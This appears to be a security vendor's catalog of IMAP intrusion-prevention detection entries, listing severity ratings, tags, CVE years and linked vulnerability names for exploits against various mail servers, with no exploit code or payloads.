About this situation: Attempt to exploit a buffer overflow vulnerability in the Atrium MERCUR IMAP service detected
Context: IMAP Client Stream
Severity: 7
Tags: Windows, x86, Mercur Messaging, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-Atrium-Software-Mercur-IMAPD-NTLMSSP-Command-Handling-Memory-Corruption
Description:
Back to top

IMAP_Authenticate-Command-Buffer-Overflow

About this situation: Buffer overflow exploit against multiple vendor IMAP services using vulnerability in authenticate command
Context: IMAP Client Stream
Severity: 7
Tags: Windows, x86, Lotus Notes, MDaemon, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-36-1210
Last changed: sgpkg-ips-159-2032
Vulnerability: IMAP-MDaemon-Authenticate-Command-Buffer-Overflow
Lotus-Domino-IMAP-Server-Cram-md5-Authentication-Buffer-Overflow
Description:
Back to top

IMAP_Authenticate-Command-Buffer-Overflow-2

About this situation: Buffer overflow exploit against multiple vendor IMAP services using vulnerability in authenticate command
Context: IMAP Client Stream
Severity: 7
Tags: Windows, x86, Lotus Notes, MDaemon, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1060-5242
Vulnerability: IMAP-MDaemon-Authenticate-Command-Buffer-Overflow
Lotus-Domino-IMAP-Server-Cram-md5-Authentication-Buffer-Overflow
Description:
Back to top

IMAP_Client-Syntax-Error

About this situation: IMAP client request could not be understood
Context: IMAP without parameters
Severity: 2
Tags: Obsolete
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-240-3038
Description: The IMAP client request could not be parsed. This can be caused by a client that does not follow the IMAP protocol specification, or if the connection does not use IMAP at all. As such, this situation is probably not very severe. However, the rest of the data sent by the client in this connection may be inspected only partially, because the protocol state has been lost.
Back to top

IMAP_CS-Alt-N-MDaemon-IMAP-Server-Fetch-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Alt-N Technologies MDaemon detected
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MDaemon, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-488-5211
Vulnerability: Alt-N-MDaemon-IMAP-Server-Fetch-Command-Buffer-Overflow
Description:
Back to top

IMAP_CS-Deflate-Compression-Capability-Request

About this situation: An IMAP deflate compression request detected
Context: IMAP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic IMAP client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-520-5211
Description:
Back to top

IMAP_CS-Dovecot-And-Pigeonhole-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Dovecot detected
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dovecot, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1199-5242
Vulnerability: Dovecot-And-Pigeonhole-Remote-Code-Execution
Description:
Back to top

IMAP_CS-Gnu-Mailutils-IMap4d-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in GNU MailUtils Mailutils detected
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GNU Mailutils, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Vulnerability: IMAP-Gnu-Mailutils-Command-Tag-Format-String-System-Compromise
Description:
Back to top

IMAP_CS-IBM-Lotus-Domino-IMAP-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino detected
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Domino, CVE2007, Any Operating System not specific, Lotus Domino not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-376-4219
Vulnerability: IBM-Lotus-Domino-IMAP-Server-Buffer-Overflow
Description:
Back to top

IMAP_CS-Ipswitch-IMail-Server-Imailsec.dll-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ipswitch IMail detected
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IMail, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Ipswitch-IMail-Server-Imailsec.dll-Heap-Buffer-Overflow
Description:
Back to top

IMAP_CS-Login-Request

About this situation: An IMAP Login Request detected
Context: IMAP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic IMAP client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Description:
Back to top

IMAP_CS-MailEnable-Professional-1.54-Buffer-Overflow

About this situation: Buffer overflow vulnerability in MailEnable Professional 1.54
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MailEnable, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: MailEnable-Professional-1.54-Buffer-Overflow
Description:
Back to top

IMAP_CS-MailEnable-W3C-Logging-Buffer-Overflow

About this situation: Buffer overflow vulnerability in MailEnable Enterprise 1.1 and Professional 1.6
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MailEnable, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: MailEnable-W3C-Logging-Buffer-Overflow
Description:
Back to top

IMAP_CS-Malformed-Append-And-Shellcode

About this situation: A possible attack against IMAP server
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-342-4219
Description:
Back to top

IMAP_CS-Malformed-Login-And-Shellcode

About this situation: A possible attack against IMAP server
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-342-4219
Description:
Back to top

IMAP_CS-Netwin-SurgeMail-IMAP-Lsub-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NetWin SurgeMail detected
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Netwin SurgeMail, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Netwin-SurgeMail-IMAP-Lsub-Command-Buffer-Overflow
Description:
Back to top

IMAP_CS-Novell-NetMail-IMAP-Buffer-Overflow

About this situation: An attempt to exploit a Novell NetMail IMAP Buffer Overflow vulnerability detected.
Context: IMAP Client Stream
Severity: 7
Tags: Windows 2000, Any Hardware, Novell NetMail, CVE2006, Windows 2000 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-748-5211
Last changed: sgpkg-ips-748-5211
Vulnerability: Novell-NetMail-IMAP-Buffer-Overflow
Description:
Back to top

IMAP_CS-Qualcomm-WorldMail-IMAP-Literal-Counter-Parsing-Buffer-Overflow

About this situation: Buffer overflow exploit against Qualcomm WorldMail IMAP literal counter parsing vulnerability
Context: IMAP Client Stream
Severity: 7
Tags: Windows, x86, Qualcomm WorldMail, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-525-5211
Vulnerability: Qualcomm-WorldMail-IMAP-Literal-Counter-Parsing-Buffer-Overflow
Description:
Back to top

IMAP_Cyrus-IMAP-Server-IMAPMAGICPLUS-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Cyrus IMAP Server detected
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cyrus IMAP Server, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Cyrus-IMAP-Server-IMAPMAGICPLUS-Buffer-Overflow
Description:
Back to top

IMAP_Dovecot-SASL-Authentication-Component-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Dovecot detected
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dovecot, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Dovecot-SASL-Authentication-Component-Denial-Of-Service
Description:
Back to top

IMAP_Excessive-Append-Command-Length

About this situation: Detects an excessively long append command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Description:
Back to top

IMAP_Excessively-Long-Argument-In-IMAP-Delete-Command-BOF

About this situation: Detects an excessively long mailbox name argument in IMAP status command
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IMail, CVE2004, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-371-4219
Last changed: sgpkg-ips-1622-5242
Vulnerability: Ipswitch-IMail-IMAP-Server-Delete-Command-BOF
Description:
Back to top

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Append-Command

About this situation: Detects an excessively long mailbox name argument in IMAP append command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2002, CVE2004, Any Operating System not specific, Generic IMAP server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-348-4219
Vulnerability: Mercury-Mail-Multiple-IMAP-Commands-BOF
ICMP-DoS-ZyXEL-Jolt-Vulnerability
Description:
Back to top

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Create-Command

About this situation: Detects an excessively long mailbox name argument in IMAP create command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2004, CVE2005, Any Operating System not specific, Generic IMAP server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-325-4219
Vulnerability: Mercury-Mail-Multiple-IMAP-Commands-BOF
IMAP-Epost-Spa-Pro-Mail-Create-Buffer-Overflow
IMAP-MailEnable-IMAP-Service-Buffer-Overflow
Novell-Groupwise-Internet-Agent-IMAP-Service-CREATE-Command-Buffer-Overflow
Description:
Back to top

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Delete-Command

About this situation: Detects an excessively long mailbox name argument in IMAP delete command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2004, CVE2005, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: Mercury-Mail-Multiple-IMAP-Commands-BOF
Ipswitch-IMail-IMAP-Server-Delete-Command-BOF
IMAP-MailEnable-IMAP-Service-Buffer-Overflow
Description:
Back to top

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command

About this situation: Detects an excessively long mailbox name argument in IMAP examine command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2004, CVE2005, CVE2006, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-173-2032
Vulnerability: Mercury-Mail-Multiple-IMAP-Commands-BOF
Ipswitch-IMail-Server-IMAP-Examine-BOF
IMAP-MailEnable-IMAP-Command-Buffer-Overflow
IMAP-MailEnable-IMAP-Service-Buffer-Overflow
HTTP-MailEnable-Examine_And_Select_Commands_Buffer_Overflow
Description:
Back to top

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Rename-Command

About this situation: Detects an excessively long mailbox name argument in IMAP rename command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2004, CVE2005, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: Mercury-Mail-Multiple-IMAP-Commands-BOF
IMAP-MailEnable-IMAP-Service-Buffer-Overflow
Description:
Back to top

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command

About this situation: Detects an excessively long mailbox name argument in IMAP select command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2004, CVE2005, CVE2006, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-402-4219
Vulnerability: Mercury-Mail-Multiple-IMAP-Commands-BOF
IMAP-Ipswitch-IMAP-Select-Command-Denial-Of-Service
IMAP-MailEnable-IMAP-Service-Buffer-Overflow
IMAP-Mercur-Messaging-IMAP-Service-Buffer-Overflow
HTTP-MailEnable-Examine_And_Select_Commands_Buffer_Overflow
Description:
Back to top

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command

About this situation: Detects an excessively long mailbox name argument in IMAP status command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2004, CVE2005, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: MDaemon-IMAP-Status-Command-BOF
Mercury-Mail-Multiple-IMAP-Commands-BOF
IMAP-Ipswitch-IMAP-Status-Command-Buffer-Overflow
IMAP-MailEnable-IMAP-Service-Buffer-Overflow
IMAP-Novell-NetMail-Buffer-Overflow
Description:
Back to top

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Subscribe-Command

About this situation: Detects an excessively long mailbox name argument in IMAP subscribe command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2004, CVE2005, CVE2007, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-275-4219
Vulnerability: Mercury-Mail-Multiple-IMAP-Commands-BOF
IMAP-MailEnable-IMAP-Service-Buffer-Overflow
Atrium-Software-Mercur-IMAPD-Subscribe-Command-Buffer-Overflow
Description:
Back to top

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Unsubscripe-Command

About this situation: Detects an excessively long mailbox name argument in IMAP unsubscripe command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2004, CVE2005, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: Mercury-Mail-Multiple-IMAP-Commands-BOF
IMAP-MailEnable-IMAP-Service-Buffer-Overflow
Description:
Back to top

IMAP_Excessively-Long-Username-Argument-In-IMAP-Login-Command

About this situation: Detects an excessively long username argument in IMAP login command
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic IMAP server, CVE2004, CVE2005, CVE2006, Any Operating System not specific, Generic IMAP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-394-4219
Vulnerability: Mercury-Mail-Multiple-IMAP-Commands-BOF
IMAP-Ipswitch-IMAP-Login-Command-Buffer-Overflow
IMAP-Mercur-Messaging-IMAP-Service-Buffer-Overflow
Description:
Back to top

IMAP_Failed-Login

About this situation: An IMAP failed login reply message detected
Context: IMAP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic IMAP server, Any Operating System not specific, Generic IMAP server not specific, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-516-5211
Description:
Back to top

IMAP_Gnu-Mailutils-IMap4d-Search-Compromise

About this situation: Format strings exploit against GNU Mailutils IMAP4d
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GNU Mailutils, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-720-5211
Vulnerability: IMAP-Gnu-Mailutils-IMap4d-Search-Compromise
Description:
Back to top

IMAP_IBM-Domino-IMAP-Mailbox-Name-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Domino detected
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Domino, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-925-5242
Last changed: sgpkg-ips-926-5242
Vulnerability: IBM-Domino-IMAP-Mailbox-Name-Stack-Buffer-Overflow
Description:
Back to top

IMAP_Ipswitch-IMail-Server-IMAP-Search-Command-Buffer-Overflow

About this situation: Buffer overflow exploit against Ipswitch IMail Server detected
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IMail, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-Ipswitch-IMail-Server-IMAP-Search-Command-Buffer-Overflow
Description:
Back to top

IMAP_Ipswitch-IMail-Server-IMAP-Search-Command-Date-String-Stack-Overflow

About this situation: Buffer overflow exploit against Ipswitch IMail Server detected
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IMail, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-Ipswitch-IMail-Server-IMAP-Search-Command-Date-String-Stack-Overflow
Description:
Back to top

IMAP_Ipswitch-IMail-Server-IMAP-Subscribe-Command-Stack-Buffer-Overflow

About this situation: Buffer overflow exploit against Ipswitch IMail Server detected
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IMail, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-Ipswitch-IMail-Server-IMAP-Subscribe-Command-Stack-Buffer-Overflow
Description:
Back to top

IMAP_Ipswitch-IMail-Server-List-Command-Denial-Of-Service

About this situation: Detects long MailboxName arguments in IMAP LIST command
Context: IMAP Client Stream
Severity: 2
Tags: Windows, x86, IMail, CVE2005, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-Ipswitch-IMail-Server-List-Command-Denial-Of-Service
Description:
Back to top

IMAP_Ipswitch-IMAP-Lsub-Denial-Of-Service

About this situation: Ipswitch IMAP server denial of service attempt
Context: IMAP Client Stream
Severity: 7
Tags: Windows, x86, Ipswitch Collaboration Suite, IMail, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-Ipswitch-IMAP-Lsub-Denial-Of-Service
Description:
Back to top

IMAP_Ipswitch-Server-Fetch-Command-Buffer-Overflow

About this situation: Long BODY or BODY.PEEK argument to IMAP FETCH command
Context: IMAP Client Stream
Severity: 7
Tags: Windows, x86, IMail, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-415-4219
Vulnerability: IMAP-Ipswitch-Server-Fetch-Command-Buffer-Overflow
Description:
Back to top

IMAP_Large-Literal-Octet-Counter-Value

About this situation: Large IMAP literal octet counter value, possible buffer overflow attack
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, x86, Kerio MailServer, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-Kerio-MailServer-Large-Literal-Octet-Counter-Denial-Of-Service
IMAP-Novell-NetMail-Large-Literal-Octet-Counter-Buffer-Overflow
Description:
Back to top

IMAP_MailEnable-IMAP-Service-Append-Command-Handling-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in MailEnable detected
Context: IMAP Client Stream
Severity: 7
Tags: Windows, x86, MailEnable, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP_MailEnable-IMAP-Service-Append-Command-Handling-Buffer-Overflow
Description:
Back to top

IMAP_MailEnable-IMAP-Service-Invalid-Command-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the MailEnable IMAP service
Context: IMAP Client Stream
Severity: 7
Tags: Windows, x86, MailEnable, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-MailEnable-IMAP-Service-Invalid-Command-Buffer-Overflow
Description:
Back to top

IMAP_MDaemon-IMAP-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MDaemon detected
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MDaemon, CVE2004, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: MDaemon-IMAP-Command-Buffer-Overflow
Description:
Back to top

IMAP_Mercury-Mail-Transport-System-IMAP-Data-Handling-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Mercury Mail Transport System detected
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mercury Mail Transport System, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP_Mercury-Mail-Transport-System-IMAP-Data-Handling-Buffer-Overflow
Description:
Back to top

IMAP_Microsoft-Exchange-Calendar-Code-Execution

About this situation: Detects Microsoft Exchange Server 2000 and 2003 Calendar exploit
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server 2003, Exchange Server 2000, MS2006-05, CVE2006, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-495-5211
Vulnerability: Microsoft-Exchange-Calendar-Code-Execution
Description:
Back to top

IMAP_Microsoft-Exchange-Server-Literal-Processing-Buffer-Overflow

About this situation: An attempt to exploit the IMAP literal processing buffer overflow vulnerability in Microsoft Exchange Server 2000
Context: IMAP Client Stream
Severity: 2
Tags: Windows, x86, Exchange Server 2000, MS2007-05, CVE2007, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-Microsoft-Exchange-Server-Literal-Processing-Buffer-Overflow
Description:
Back to top

IMAP_Novell-NetMail-IMAP-Append-Command-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the Novell NetMail IMAP service
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell NetMail, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: IMAP-Novell-NetMail-IMAP-Append-Command-Buffer-Overflow
Description:
Back to top

IMAP_Novell-NetMail-IMAP-Verb-Literal-Heap-Overflow

About this situation: Detects buffer overflow exploits against the Novell NetMail IMAP service
Context: IMAP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell NetMail, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-722-5211
Vulnerability: IMAP-Novell-NetMail-IMAP-Verb-Literal-Heap-Overflow
Description:
Back to top

IMAP_Pipelining-Lost

About this situation: Pipeline of an IMAP connection was lost due to low memory
Context: IMAP without parameters
Severity: 2
Tags: Potential Compromise, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-454-4333
Description: The command pipeline of this IMAP connection has been discarded due to low memory. The inspection and antivirus function only partially for this connection after this has happened. It is unusual that IMAP protocol uses very long pipelines, so this can be an evasion attempt or some kind of attack against deep inspection systems or against the IMAP server.
Back to top

IMAP_Qualcomm-WorldMail-IMAP-Server-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Qualcomm WorldMail detected
Context: IMAP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Qualcomm WorldMail, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Qualcomm-WorldMail-IMAP-Server-Directory-Traversal
Description:
Back to top

IMAP_Server-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: IMAP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1322-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

IMAP_Server-Syntax-Error

About this situation: IMAP server response could not be understood
Context: IMAP without parameters
Severity: 2
Tags: Obsolete
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-240-3038
Description: The IMAP server response could not be parsed. This can be caused by a server that does not follow the IMAP protocol specification, or if the connection does not use IMAP at all. As such, this situation is probably not very severe. However, the rest of the data sent by the server in this connection may be inspected only partially, because the protocol state has been lost.
Back to top

IMAP_SS-Small-AVI-Container

About this situation: Detects tiny RIFF-AVI video containers
Context: IMAP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-490-5211
Vulnerability: Small-AVI-Container
Description:
Back to top

IMAP_StartTLS

About this situation: StartTLS usage detected on IMAP
Context: IMAP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-479-5211
Vulnerability: StartTLS-Usage
Description:
Back to top

IMAP_Uncertain-Message-Part

About this situation: IMAP message part with uncertain antivirus scan
Context: IMAP without parameters
Severity: 2
Tags: Compromise
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
